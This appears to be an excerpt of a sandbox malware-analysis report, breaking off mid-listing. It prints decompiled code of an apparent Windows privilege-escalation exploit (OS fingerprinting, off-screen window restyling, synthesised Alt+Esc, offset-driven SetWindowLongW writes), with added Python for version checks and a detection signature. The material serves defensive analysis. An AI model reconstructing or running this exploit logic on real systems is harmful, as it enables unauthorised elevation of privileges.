                      0x0093d6a0
                      0x0093d6ae
                      0x0093d6bb
                      0x0093d6d6
                      0x0093d6d6
                      0x0093d6bb
                      0x00000000
                      0x0093d5a9
                      0x00000000
                      0x0093d540
                      0x0093d510
                      0x0093d27a
                      0x0093d25e
                      0x0093d25e

                      APIs
                      • CreateWindowExW.USER32 ref: 0093D172
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0093D1AE
                      • SetWindowLongW.USER32 ref: 0093D1BD
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D272
                      • RegisterClassExW.USER32 ref: 0093D312
                      • _memset.LIBCMT ref: 0093D32F
                      • CreateWindowExW.USER32 ref: 0093D364
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D716
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$CreateDestroyLong$ClassRegister_memset
                      • String ID: #32768$0$MyExtraWnd$MyMainWnd
                      • API String ID: 2621406899-1346871510
                      • Opcode ID: 7e1cc614903a9725cb7b0a5894dc345f8bc00f0c58ab4b961b6e978a8719cd3f
                      • Instruction ID: d185ee95e3871d2b77ebf67994149e44b99eaaab824566e184b5c4a336f75f8a
                      • Opcode Fuzzy Hash: 7e1cc614903a9725cb7b0a5894dc345f8bc00f0c58ab4b961b6e978a8719cd3f
                      • Instruction Fuzzy Hash: FBF18CB19293149FEB20DF69EC49FAB7BB8FB09315F100265E519A72E0CB749884DF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 339 93ca30-93ca78 Sleep GetModuleHandleA LoadLibraryA 340 93ca7a-93ca8b call 93161c 339->340 341 93ca8e-93caaf GetVersionExW 339->341 343 93cc21-93cc8d RegisterClassExW 341->343 344 93cab5-93cabc 341->344 343->340 345 93cc93-93ccc5 GetSystemMetrics * 2 CreateThread 343->345 347 93cadf-93cae8 GetModuleHandleA 344->347 348 93cabe-93cac5 344->348 349 93cd21-93cd36 call 93161c 345->349 350 93ccc7-93cccf 345->350 352 93cb56-93cb67 IsWow64Process 347->352 353 93caea-93cafa 347->353 348->347 351 93cac7-93cad5 348->351 354 93ccd1-93ccdc 350->354 355 93ccfa-93cd1f TerminateThread Sleep keybd_event * 2 350->355 351->352 358 93cad7-93cadd 351->358 352->340 357 93cb6d-93cb74 352->357 359 93cb43-93cb46 353->359 360 93cafc-93cafe 353->360 354->355 361 93ccde-93ccea 354->361 355->349 357->340 364 93cb7a-93cbe3 call 93cfd0 call 93cd40 357->364 358->352 359->340 362 93cb4c 359->362 365 93cb00-93cb0a 360->365 366 93cb0c-93cb0f 360->366 361->355 367 93ccec-93ccf8 Sleep 361->367 362->352 364->340 377 93cbe9-93cbeb 364->377 365->352 369 93cb11-93cb1b 366->369 370 93cb1d-93cb20 366->370 367->354 367->355 369->352 371 93cb22-93cb2c 370->371 372 93cb2e-93cb31 370->372 371->352 372->340 374 93cb37-93cb41 372->374 374->352 377->340 378 93cbf1-93cc1c 377->378 378->343
                      C-Code - Quality: 79%
                      			E0093CA30(void* __ebx, signed int __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				char _v10;
                      				struct _OSVERSIONINFOW _v292;
                      				int _v296;
                      				struct _WNDCLASSEXW _v344;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t37;
                      				signed int _t57;
                      				signed int _t58;
                      				struct HINSTANCE__* _t61;
                      				int* _t62;
                      				signed int _t63;
                      				signed int _t65;
                      				signed int _t67;
                      				signed int _t69;
                      				intOrPtr _t72;
                      				signed int _t82;
                      				void* _t83;
                      				void* _t84;
                      				void* _t85;
                      				intOrPtr _t90;
                      				signed int _t91;
                      				void* _t92;
                      				void* _t93;
                      				void* _t95;
                      				signed int _t96;
                      
                      				_t91 = __edx;
                      				_t83 = __ebx;
                      				_t37 =  *0x943050; // 0xce43520a
                      				_v8 = _t37 ^ _t96;
                      				_t92 = Sleep;
                      				_v296 = 0;
                       				Sleep(0xc8); // 200 ms
                      				_t93 = GetModuleHandleA;
                      				 *0x9580b8 = GetModuleHandleA(0);
                      				if(LoadLibraryA("USER32.dll") != 0) {
                      					 *0x9580b4 = _a4;
                       					_v292.dwOSVersionInfoSize = 0x11c; // 0x11c == sizeof(OSVERSIONINFOEXW): the buffer is the EX form, not the OSVERSIONINFOW the decompiler labelled it as
                      					if(GetVersionExW( &_v292) == 0) {
                      						L24:
                      						asm("xorps xmm0, xmm0");
                      						_v344.hInstance =  *0x9580b8;
                       						_v344.cbSize = 0x30; // sizeof(WNDCLASSEXW), 32-bit layout
                      						_v344.style = 0;
                      						_v344.lpfnWndProc = E0093D960;
                      						_v344.cbClsExtra = 0;
                      						_v344.cbWndExtra = 0;
                      						asm("movdqu [ebp-0x13c], xmm0");
                      						_v344.lpszClassName = L"MyMainWnd";
                      						_v344.hIconSm = 0;
                      						if(RegisterClassExW( &_v344) == 0) {
                      							goto L1;
                      						} else {
                      							_t94 = GetSystemMetrics;
                      							_push(_t83);
                       							 *0x944248 = GetSystemMetrics(0); // SM_CXSCREEN
                       							 *0x94424c = GetSystemMetrics(1); // SM_CYSCREEN
                      							_t84 = CreateThread(0, 0, E0093D110, 0, 0, 0);
                      							if(_t84 != 0) {
                      								_t95 = 0;
                      								if( *0x95807c == 0) {
                      									while(1) {
                      										_t57 =  *0x944244; // 0xa
                      										if( *0x9580bc >= _t57) {
                      											goto L30;
                      										}
                       										_t58 =  *0x944244; // 0xa
                       										if(_t95 < _t58 + _t58 * 4 + _t58 + _t58 * 4) { // 10 * *0x944244 polls of 100 ms (about 10 s with the dumped value), waiting for *0x95807c to become non-zero
                       											Sleep(0x64); // 100 ms
                      											_t95 = _t95 + 1;
                      											if( *0x95807c == 0) {
                      												continue;
                      											}
                      										}
                      										goto L30;
                      									}
                      								}
                      								L30:
                      								TerminateThread(_t84, 0);
                      								Sleep(0x64);
                      								_t94 = keybd_event;
                       								keybd_event(0x1b, 0, 2, 0); // VK_ESCAPE, KEYEVENTF_KEYUP
                       								keybd_event(0x12, 0, 2, 0); // VK_MENU (Alt), KEYEVENTF_KEYUP
                      							}
                      							_pop(_t85);
                      							return E0093161C(_t85, _v8 ^ _t96, _t91, _t92, _t94);
                      						}
                      					} else {
                       						if(_v292.dwMajorVersion != 5 || _v292.dwMinorVersion < 1) { // anything other than 5.1/5.2 (XP / Server 2003) is re-checked against ntdll's PE header below
                      							_t61 = GetModuleHandleA("ntdll.dll");
                      							if(_t61 == 0) {
                      								goto L19;
                      							} else {
                       								_t90 =  *((intOrPtr*)(_t61 + 0x3c)); // IMAGE_DOS_HEADER.e_lfanew
                       								_t91 =  *(_t90 + _t61 + 0x40) & 0x0000ffff; // OptionalHeader.MajorOperatingSystemVersion of the loaded ntdll.dll
                       								_t82 =  *(_t90 + _t61 + 0x42) & 0x0000ffff; // OptionalHeader.MinorOperatingSystemVersion
                       								if(_t91 != 6) { // 6.x covers Vista through 8.1
                       									if(_t91 != 0xa) { // 10.x: Windows 10
                      										goto L1;
                      									} else {
                      										 *0x9441b0 = 6;
                      										goto L19;
                      									}
                      								} else {
                      									if(_t82 != 0) {
                      										if(_t82 != 1) {
                      											if(_t82 != 2) {
                      												if(_t82 != 3) {
                      													goto L1;
                      												} else {
                      													 *0x9441b0 = 5;
                      													goto L19;
                      												}
                      											} else {
                      												 *0x9441b0 = 4;
                      												goto L19;
                      											}
                      										} else {
                      											 *0x9441b0 = 3;
                      											goto L19;
                      										}
                      									} else {
                      										 *0x9441b0 = 2;
                      										goto L19;
                      									}
                      								}
                      							}
                      						} else {
                      							 *0x9441b0 = 0;
                       							if(_v10 != 1) { // _v10 overlays OSVERSIONINFOEXW.wProductType; 1 == VER_NT_WORKSTATION, so server editions get index 1
                      								 *0x9441b0 =  *0x9441b0 + 1;
                      							}
                      							L19:
                      							_t62 =  &_v296;
                       							__imp__IsWow64Process(0xffffffff, _t62); // -1 == GetCurrentProcess() pseudo-handle; the sample returns unless it is a 32-bit process running under WOW64
                      							if(_t62 == 0 || _v296 == 0) {
                      								goto L1;
                      							} else {
                      								 *0x958058 = 1;
                      								_t63 =  *0x9441b0; // 0x8
                      								 *0x9441ec =  *((intOrPtr*)(0x9441d0 + _t63 * 4));
                      								_t65 =  *0x9441b0; // 0x8
                      								 *0x958070 =  *((intOrPtr*)(0x9441f0 + _t65 * 4));
                      								_t67 =  *0x9441b0; // 0x8
                      								 *0x958074 =  *((intOrPtr*)(0x94420c + _t67 * 4));
                      								_t69 =  *0x9441b0; // 0x8
                      								 *0x958078 =  *((intOrPtr*)(0x944228 + _t69 * 4));
                      								 *0x958060 = E0093CFD0();
                      								_t72 = E0093CD40();
                      								 *0x958064 = _t72;
                      								if( *0x958060 == 0 || _t72 == 0) {
                      									goto L1;
                      								} else {
                      									 *0x958068 = _t72 + 0xfffffff8;
                      									asm("sbb eax, eax");
                      									 *0x95805c = ( ~( *0x958058) & 0x00000018) + 0x2a;
                      									asm("sbb eax, eax");
                      									 *0x95806c = ( ~( *0x958058) & 0x00000024) + 0x34;
                      									goto L24;
                      								}
                      							}
                      						}
                      					}
                      				} else {
                      					L1:
                      					return E0093161C(_t83, _v8 ^ _t96, _t91, _t92, _t93);
                      				}
                      			}
                       Address gutter for the listing above (one instruction address per C line, 0x00000000 where a line has none; the alignment with the listing was lost in extraction): 0x0093ca30 to 0x0093cd36.

                      APIs
                      • Sleep.KERNEL32(000000C8,?,00000000), ref: 0093CA5A
                      • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093CA64
                      • LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093CA70
                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 0093CAA7
                      • IsWow64Process.KERNEL32(000000FF,00000000,?,00000000), ref: 0093CB5F
                      • RegisterClassExW.USER32 ref: 0093CC84
                      • GetSystemMetrics.USER32 ref: 0093CC9C
                      • GetSystemMetrics.USER32 ref: 0093CCA5
                      • CreateThread.KERNEL32 ref: 0093CCBB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                       • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: MetricsSystem$ClassCreateHandleLibraryLoadModuleProcessRegisterSleepThreadVersionWow64
                      • String ID: 0$MyMainWnd$USER32.dll$ntdll.dll
                      • API String ID: 3039634143-1536395663
                      • Opcode ID: 4c84c8995d5845fb29ee7a97a589395b2c78357e6f27302f6d29e54da8762bd5
                      • Instruction ID: d39ed115c6c44f30877458e928602c393ed1ec9d83f30085e9be7ace789d118d
                      • Opcode Fuzzy Hash: 4c84c8995d5845fb29ee7a97a589395b2c78357e6f27302f6d29e54da8762bd5
                      • Instruction Fuzzy Hash: 0981ACB4A287489FDB20CF65EC46BAA7BF4E719315F000156E505FB2E0DBB49988EF41
                      Uniqueness

                      Uniqueness Score: -1.00%
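The version fingerprint in E0093CA30, as an added example that is not code from the report or from the sample: a Python re-implementation of the branch structure, with the index values read off the decompilation (0x9441b0 becomes 0 or 1 for XP / Server 2003 depending on wProductType, 2 to 5 for an ntdll whose header says 6.0 to 6.3, and 6 for 10.x) and a constructed PE header stub in place of a real ntdll.dll. The function and variable names are chosen here and are hypothetical.

```python
"""
Added example, not code from the Joe Sandbox report or from the sample:
the OS-version fingerprint decompiled in E0093CA30, rewritten so the
branches can be read and checked.  Offsets and index values come from
the decompilation; names are hypothetical; the PE header is a
constructed byte string, so nothing runs against a real ntdll.dll.
"""
import struct

E_LFANEW = 0x3C                 # IMAGE_DOS_HEADER.e_lfanew
NT_MAJOR_OS_VERSION = 0x40      # IMAGE_NT_HEADERS -> OptionalHeader.MajorOperatingSystemVersion
NT_MINOR_OS_VERSION = 0x42      # IMAGE_NT_HEADERS -> OptionalHeader.MinorOperatingSystemVersion
VER_NT_WORKSTATION = 1          # OSVERSIONINFOEXW.wProductType value tested as _v10 != 1


def os_version_from_pe_header(image: bytes):
    """(major, minor) OS version stored in a PE image's optional header.

    E0093CA30 reads these two WORDs from the loaded ntdll.dll image;
    unlike GetVersionExW they are not rewritten by compatibility shims."""
    if image[:2] != b"MZ" or len(image) < E_LFANEW + 4:
        raise ValueError("not a DOS/PE header")
    e_lfanew = struct.unpack_from("<I", image, E_LFANEW)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad IMAGE_NT_SIGNATURE")
    major = struct.unpack_from("<H", image, e_lfanew + NT_MAJOR_OS_VERSION)[0]
    minor = struct.unpack_from("<H", image, e_lfanew + NT_MINOR_OS_VERSION)[0]
    return major, minor


def table_index(reported, ntdll_image: bytes, is_wow64: bool = True):
    """Value E0093CA30 leaves at 0x9441b0 (the index into its per-OS
    tables), or None where the sample returns without doing anything.

    reported    -- (dwMajorVersion, dwMinorVersion, wProductType) as GetVersionExW fills them in
    ntdll_image -- bytes of the ntdll.dll image whose PE header is consulted
    is_wow64    -- what IsWow64Process reports for the current process
    """
    major, minor, product_type = reported
    if major == 5 and minor >= 1:
        # XP / Server 2003 are trusted as reported: 0 for a workstation, 1 for a server
        index = 0 if product_type == VER_NT_WORKSTATION else 1
    else:
        # Everything else is re-read from ntdll's PE header
        major, minor = os_version_from_pe_header(ntdll_image)
        if major == 10:
            index = 6
        elif major == 6 and 0 <= minor <= 3:
            index = minor + 2        # 6.0 -> 2, 6.1 -> 3, 6.2 -> 4, 6.3 -> 5
        else:
            return None              # unsupported build: the sample bails out
    # The sample only proceeds as a 32-bit process under WOW64 (IsWow64Process must report TRUE)
    return index if is_wow64 else None


def build_pe_header(major: int, minor: int) -> bytes:
    """Constructed DOS + NT header stub carrying only the fields read above
    (test data, not a real image)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW, e_lfanew)
    nt = bytearray(0x60)
    nt[:4] = b"PE\0\0"
    struct.pack_into("<H", nt, NT_MAJOR_OS_VERSION, major)
    struct.pack_into("<H", nt, NT_MINOR_OS_VERSION, minor)
    return bytes(dos + nt)


if __name__ == "__main__":
    # Windows 10 reporting 6.2 through GetVersionExW still maps to index 6
    print(table_index((6, 2, VER_NT_WORKSTATION), build_pe_header(10, 0)))
```

The second read exists because GetVersionExW is subject to compatibility shims on newer Windows, so a sample that selects per-build constants from its tables cannot rely on it; the MajorOperatingSystemVersion and MinorOperatingSystemVersion fields in ntdll's optional header give the build the module was built for. The WOW64 check mirrors the IsWow64Process test in the listing: the sample only continues as a 32-bit process on 64-bit Windows.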

                      Control-flow Graph

                      • Executed
                      • Not Executed
                       control_flow_graph (basic blocks: id, address range, APIs called, successor blocks)
                       • 379 93d538-93d53f -> 380
                       • 380 93d540-93d54b -> 381, 382
                       • 381 93d551-93d576 -> 383, 384
                       • 382 93d70e-93d739 call 93161c
                       • 383 93d6fb-93d708 -> 380, 382
                       • 384 93d57c-93d58e CreateThread -> 386
                       • 386 93d593-93d59a -> 388, 389
                       • 388 93d5a6-93d5a9 -> 391, 392
                       • 389 93d59c-93d5a4 Sleep -> 386, 388
                       • 391 93d5af-93d5f0 CreateWindowExW -> 393, 394
                       • 392 93d6dd-93d6f5 DestroyWindow * 2 TerminateThread -> 383
                       • 393 93d5f6-93d682 GetWindowLongW SetWindowLongW call 9310c5 keybd_event * 4 Sleep -> 394
                       • 394 93d688-93d6bb DestroyWindow * 2 TerminateThread WaitForSingleObject -> 383, 396
                       • 396 93d6bd-93d6cf -> 383, 398
                       • 398 93d6d1-93d6db call 93c820 -> 383
                      C-Code - Quality: 65%
                      			E0093D538() {
                      				intOrPtr _t5;
                      				intOrPtr _t16;
                      				intOrPtr _t18;
                      				void* _t46;
                      				void* _t52;
                      				void* _t53;
                      				void* _t56;
                      				struct _SECURITY_ATTRIBUTES* _t57;
                      				signed int _t60;
                      
                      				while(1) {
                      					_t5 =  *0x944244; // 0xa
                      					if( *0x9580bc >= _t5) {
                      						break;
                      					}
                      					 *0x9580d4 = 0;
                      					 *0x9580d8 = 0;
                      					 *0x9580d0 = 0;
                      					if( *0x95807c != 0) {
                      						L13:
                      						 *0x9580bc =  *0x9580bc + 1;
                      						if( *0x95807c == 0) {
                      							continue;
                      						}
                      						break;
                      					}
                      					_t57 = 0;
                      					 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
                      					while( *0x9580d0 == 0) {
                      						_t57 =  &(_t57->nLength);
                       						Sleep(0x32); // 50 ms
                       						if(_t57 < 0x14) { // up to 20 polls (1 s) for the worker thread to set *0x9580d0
                      							continue;
                      						}
                      						break;
                      					}
                      					if(_t57 >= 0x14) {
                      						DestroyWindow( *0x9580d4);
                      						DestroyWindow( *0x9580d8);
                      						TerminateThread( *0x9580c0, 0xffffffff);
                      					} else {
                      						_t16 =  *0x94424c; // 0x1388
                      						_t18 =  *0x944248; // 0x1388
                       						 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t18 + 1, _t16 + 1, 1, 1, 0, 0,  *0x9580b8, 0); // WS_EX_LAYERED, WS_VISIBLE, no parent, 1x1 window at (SM_CXSCREEN+1, SM_CYSCREEN+1): just off the screen
                      						if( *0x9580d8 != 0) {
                      							asm("adc edi, 0x0");
                      							asm("adc edi, 0x0");
                      							asm("adc edi, 0xffffffff");
                       							SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000); // GWL_STYLE (-16) |= WS_CHILD (0x40000000) on a window that was created top-level
                      							_push( *0x95808c);
                      							_push( *0x958088 +  *0x958064 + 3 - 0x28);
                       							_push(0xfffffff4); // -12 == GWL_ID
                      							_push( *0x9580d8);
                      							_push( *0x9441ec);
                      							L009310C5();
                       							keybd_event(0x12, 0, 0, 0); // VK_MENU (Alt) down
                       							keybd_event(0x1b, 0, 0, 0); // VK_ESCAPE down
                       							keybd_event(0x1b, 0, 2, 0); // VK_ESCAPE up (KEYEVENTF_KEYUP)
                       							keybd_event(0x12, 0, 2, 0); // VK_MENU up: a synthesised Alt+Esc
                      							Sleep(0x64);
                      						}
                      						DestroyWindow( *0x9580d4);
                      						DestroyWindow( *0x9580d8);
                      						TerminateThread( *0x9580c0, 0xffffffff);
                      						WaitForSingleObject( *0x9580c0, 0xffffffff);
                      						if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
                      							 *0x95807c = E0093C820();
                      						}
                      					}
                      					goto L13;
                      				}
                      				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0x10));
                      				_pop(_t53);
                      				_pop(_t56);
                      				_pop(_t46);
                      				return E0093161C(_t46,  *(_t60 - 0x1c) ^ _t60, _t52, _t53, _t56);
                      			}

                       Address gutter for the listing above (one instruction address per C line, 0x00000000 where a line has none; the alignment with the listing was lost in extraction): 0x0093d540 to 0x0093d739.

                      APIs
                      • CreateThread.KERNEL32 ref: 0093D588
                      • Sleep.KERNEL32(00000032), ref: 0093D59F
                      • CreateWindowExW.USER32 ref: 0093D5DE
                      • GetWindowLongW.USER32(?,000000F0), ref: 0093D621
                      • SetWindowLongW.USER32 ref: 0093D635
                      • keybd_event.USER32 ref: 0093D65E
                      • keybd_event.USER32 ref: 0093D668
                      • keybd_event.USER32 ref: 0093D672
                      • keybd_event.USER32 ref: 0093D67C
                      • Sleep.KERNEL32(00000064), ref: 0093D680
                      • DestroyWindow.USER32(?), ref: 0093D68E
                      • DestroyWindow.USER32(?), ref: 0093D696
                      • TerminateThread.KERNEL32(?,000000FF), ref: 0093D6A0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0093D6AE
                      • DestroyWindow.USER32(?), ref: 0093D6E3
                      • DestroyWindow.USER32(?), ref: 0093D6EB
                      • TerminateThread.KERNEL32(?,000000FF), ref: 0093D6F5
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D716
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                       • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$keybd_event$Thread$CreateLongSleepTerminate$ObjectSingleWait
                      • String ID: MyMainWnd
                      • API String ID: 2733185211-188152914
                      • Opcode ID: da864e60af1605bda5e1c0f193f461a3dbcd2b38c61e84462d8bd7c7c91d0860
                      • Instruction ID: c4dc741d3834601bded08d50f1e087ffd5763ad6e68469e7ad5898a51615e9a3
                      • Opcode Fuzzy Hash: da864e60af1605bda5e1c0f193f461a3dbcd2b38c61e84462d8bd7c7c91d0860
                      • Instruction Fuzzy Hash: 03519171669310AFE7209B7AFC4AF973768F705726F100114F625AB2E0CBB46848EF54
                      Uniqueness

                      Uniqueness Score: -1.00%
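A behavioural check for the window sequence in E0093D538, as an added example that is not part of the report or of the sample's code: it runs over an API-call trace in a line format constructed here (the real sandbox log format, the function names and the sample lines are all hypothetical) and reports a window that was created just past the screen edge without a parent, had WS_CHILD added through SetWindowLongW(GWL_STYLE), and was then followed by a synthesised Alt+Esc through keybd_event.

```python
"""
Added example, not code from the Joe Sandbox report or from the sample:
a behavioural signature for the window trick decompiled in E0093D538,
run over an API-call trace.  The trace format, the function names and
the sample lines are all constructed here for illustration.
"""
import re

GWL_STYLE = -16
WS_CHILD = 0x40000000
VK_MENU = 0x12            # Alt
VK_ESCAPE = 0x1B
KEYEVENTF_KEYUP = 0x2

# Hypothetical trace line: Api(name=value, ...) [-> return]
CALL_RE = re.compile(r"^(?P<api>\w+)\((?P<args>.*)\)(?:\s*->\s*(?P<ret>\S+))?$")


def parse_call(line: str):
    """Split one trace line into (api, {arg: value}, return_value)."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for item in filter(None, (a.strip() for a in m.group("args").split(","))):
        name, _, value = item.partition("=")
        args[name] = value.strip('"') if value.startswith('"') else int(value, 0)
    ret = m.group("ret")
    return m.group("api"), args, (int(ret, 0) if ret else None)


def find_offscreen_child_alt_esc(lines):
    """One finding per window that (1) was created top-level beyond the
    screen edge, (2) had WS_CHILD added via SetWindowLongW(GWL_STYLE) and
    (3) was followed by a synthesised Alt+Esc, as in E0093D538."""
    screen = {}               # GetSystemMetrics index -> value seen in the trace
    offscreen = {}            # hwnd -> creation details
    reparented = {}           # hwnd -> line of the WS_CHILD style change
    alt_down = False
    findings = []
    for lineno, line in enumerate(lines, 1):
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, args, ret = parsed
        if api == "GetSystemMetrics" and ret is not None:
            screen[args.get("nIndex")] = ret
        elif api == "CreateWindowExW" and ret:
            beyond_x = 0 in screen and args.get("x", 0) > screen[0]   # SM_CXSCREEN
            beyond_y = 1 in screen and args.get("y", 0) > screen[1]   # SM_CYSCREEN
            if (beyond_x or beyond_y) and args.get("hWndParent", 0) == 0:
                offscreen[ret] = {"class": args.get("lpClassName"), "line": lineno}
        elif api == "SetWindowLongW":
            hwnd = args.get("hWnd")
            if (hwnd in offscreen and args.get("nIndex") == GWL_STYLE
                    and args.get("dwNewLong", 0) & WS_CHILD):
                reparented[hwnd] = lineno
        elif api == "keybd_event":
            vk, key_up = args.get("bVk"), bool(args.get("dwFlags", 0) & KEYEVENTF_KEYUP)
            if vk == VK_MENU:
                alt_down = not key_up
            elif vk == VK_ESCAPE and not key_up and alt_down:
                # Alt is held and Escape goes down: report every reparented window
                for hwnd, style_line in list(reparented.items()):
                    findings.append({"hwnd": hwnd, "class": offscreen[hwnd]["class"],
                                     "created": offscreen[hwnd]["line"],
                                     "reparented": style_line, "alt_esc": lineno})
                    del reparented[hwnd]
    return findings


# Constructed trace modelled on the calls in E0093CA30 / E0093D538 (not a real log)
SAMPLE_TRACE = """
GetSystemMetrics(nIndex=0) -> 1920
GetSystemMetrics(nIndex=1) -> 1080
CreateThread(lpStartAddress=0x93c970) -> 0x2c4
CreateWindowExW(dwExStyle=0x80000, lpClassName="MyMainWnd", dwStyle=0x10000000, x=1921, y=1081, nWidth=1, nHeight=1, hWndParent=0) -> 0x10ac
GetWindowLongW(hWnd=0x10ac, nIndex=-16) -> 0x10000000
SetWindowLongW(hWnd=0x10ac, nIndex=-16, dwNewLong=0x50000000) -> 0x10000000
keybd_event(bVk=0x12, bScan=0, dwFlags=0, dwExtraInfo=0)
keybd_event(bVk=0x1b, bScan=0, dwFlags=0, dwExtraInfo=0)
keybd_event(bVk=0x1b, bScan=0, dwFlags=0x2, dwExtraInfo=0)
keybd_event(bVk=0x12, bScan=0, dwFlags=0x2, dwExtraInfo=0)
DestroyWindow(hWnd=0x10ac) -> 1
""".strip().splitlines()

if __name__ == "__main__":
    for finding in find_offscreen_child_alt_esc(SAMPLE_TRACE):
        print(finding)
```

Alt+Esc switches the foreground window, so the synthesised keystrokes make the window manager act on the window that has just been restyled; benign software has little reason to turn a top-level window into a child window after creation, which is what keeps this three-step signature specific. The same state machine can be pointed at a real sandbox export once parse_call is replaced by a parser for that log format.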

                      Control-flow Graph

                      C-Code - Quality: 93%
                      			E0093C4E0(long _a4, short _a8) {
                      				signed int _v8;
                      				short _v1008;
                      				intOrPtr _v1012;
                      				signed int _v1016;
                      				long _v1020;
                      				intOrPtr _v1024;
                      				long _v1028;
                      				intOrPtr _v1032;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t47;
                      				intOrPtr _t49;
                      				int _t55;
                      				int _t57;
                      				intOrPtr _t58;
                      				struct HWND__* _t66;
                      				intOrPtr _t78;
                      				intOrPtr _t79;
                      				void* _t99;
                      				void* _t100;
                      				intOrPtr _t101;
                      				intOrPtr _t103;
                      				intOrPtr _t104;
                      				intOrPtr _t110;
                      				intOrPtr _t112;
                      				intOrPtr _t120;
                      				signed int _t124;
                      				signed int _t125;
                      				long _t128;
                      				void* _t131;
                      				intOrPtr _t132;
                      				signed int _t133;
                      
                      				_t47 =  *0x943050; // 0xce43520a
                      				_v8 = _t47 ^ _t133;
                      				_t49 =  *0x957ff0; // 0x0
                      				_v1028 =  *((intOrPtr*)( *0x958014 + _t49));
                      				_v1012 = 0xffffffff;
                      				_v1024 = 0xffffffff;
                       				E00935A90( &_v1008, 0, 0x3e8); // memset-like helper: zero the 1000-byte (500 WCHAR) buffer
                      				_v1008 = _a8;
                      				_t55 = lstrlenW( &_v1008);
                      				if(_t55 != 2) {
                      					_t101 = _t55 + _t55;
                      					_v1012 = _t101;
                      					 *((short*)(_t133 + _t101 - 0x3ec)) = 0x3333;
                      				}
                      				_t57 = lstrlenW( &_v1008);
                      				if(_t57 != 2) {
                      					_t132 = _t57 + _t57;
                      					_v1024 = _t132;
                      					 *((short*)(_t133 + _t132 - 0x3ec)) = 0x3333;
                      				}
                      				_t99 = 2;
                      				_t128 = _a4 + 4;
                      				_v1016 = 1;
                      				_v1020 = _t128;
                      				do {
                      					_t103 =  *0x958014;
                      					_t58 =  *0x957ff4; // 0x0
                      					_v1032 =  *((intOrPtr*)(_t103 + _t58 + 4));
                      					_t104 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t104 -  *0x95801c, _t128);
                       					_t66 = GetAncestor( *0x958010, 1); // GA_PARENT
                      					_t120 =  *0x957ff4; // 0x0
                      					_t121 = _t120 -  *0x95801c;
